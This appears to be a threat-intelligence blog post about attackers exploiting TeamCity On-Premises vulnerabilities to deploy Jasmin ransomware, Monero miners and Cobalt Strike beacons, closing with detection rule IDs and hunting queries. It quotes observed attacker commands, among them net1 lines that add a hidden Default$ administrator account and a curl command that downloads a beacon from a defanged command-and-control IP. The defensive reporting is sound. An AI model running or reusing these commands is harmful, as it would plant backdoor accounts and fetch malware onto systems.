TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types

Executing domain discovery and persistence commands

Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the java.exe process under a vulnerable TeamCity server directory.

Parent Process:
C:\TeamCity\jre\bin\java.exe

We observed the following subject processes being used for discovery and persistence tactics:

  • C:\WINDOWS\system32\net.exe  group /domain
  • C:\WINDOWS\system32\net1.exe localgroup Administratoren /add Default$
  • C:\WINDOWS\system32\net1.exe localgroup Administrators /add Default$
  • C:\WINDOWS\system32\net1.exe user /add Default$ GH{redacted}23gwg
  • C:\WINDOWS\system32\net1.exe user /del defaultuser0
  • C:\WINDOWS\system32\net1.exe user /domain
  • C:\WINDOWS\system32\net1.exe user administrator
  • C:\WINDOWS\system32\net1.exe user default$
  • C:\WINDOWS\system32\nltest.exe  /domain_trusts

Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.

Deploying Cobalt Strike beacons

Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.

The beacon was downloaded using the command curl  hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf and was saved in the path C:\TeamCity\bin\.conf.

This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.

Conclusion

The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.

This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.

The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.

  • 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
  • 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability

  • 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
  • 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)

  • 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
  • 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)

Description Trend Vision One Query
Jasmin ransomware file encryption event eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc
Service Installation of the Monero miner’s dropped Kernel driver as seen from the registry eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys
Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe eventSubId:2 and processCmd:IndexStore.bat and objectCmd:(“certutil” and “decode”)
Execution of the SparkRAT malware from the batch file eventSubId:2 and processFilePath:cmd.exe and processCmd:win.bat and objectCmd:windowDefenSrv
Detection of suspicious process invocations from a TeamCity process eventSubId:2 AND processCmd:TeamCity AND objectCmd:(“powershell” OR “net” OR “nltest” OR “msiexec”)

Read More HERE